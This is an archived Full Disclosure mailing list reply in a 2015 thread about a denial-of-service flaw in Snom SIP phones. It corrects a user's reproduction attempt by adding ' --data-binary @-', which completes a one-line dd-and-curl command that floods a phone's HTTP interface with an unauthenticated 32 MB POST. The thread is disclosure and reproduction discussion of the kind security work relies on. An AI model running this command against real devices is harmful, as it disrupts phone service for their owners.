| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAJVSNc+OrZhQadw5ndP0-2rOiYr4U5H9xbsgU9UkvrXkRN7E-w@mail.gmail.com> Date: Tue, 13 Jan 2015 09:52:19 +0100 From: "kapejod@...glemail.com" <kapejod@...il.com> To: Martin Schuhmacher <broetchen25@....net> Cc: fulldisclosure@...lists.org Subject: Re: [FD] Snom SIP phones denial of service through HTTP The latest version is 8.7.3.25.9, there is no 8.7.4.X, yet. And yes, you missed something, (without the quotes) " --data-binary @-" This turns it into a HTTP POST request and uses the input from stdin. Otherwise you just do a regular HTTP GET which gets blocked because it's not authenticated. On Mon, Jan 12, 2015 at 10:20 PM, Martin Schuhmacher <broetchen25@....net> wrote: > Hi > > i just did > > $ dd if=/dev/zero bs=1M count=32 | curl http://$IP/ > Response: Unauthorized request > > did i miss anything? > > Firmware: snom360-SIP 8.7.4.8 > not downloadable any more for some reason? > > Yours > Martin > > _______________________________________________ > Sent through the Full Disclosure mailing list > http://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ > _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists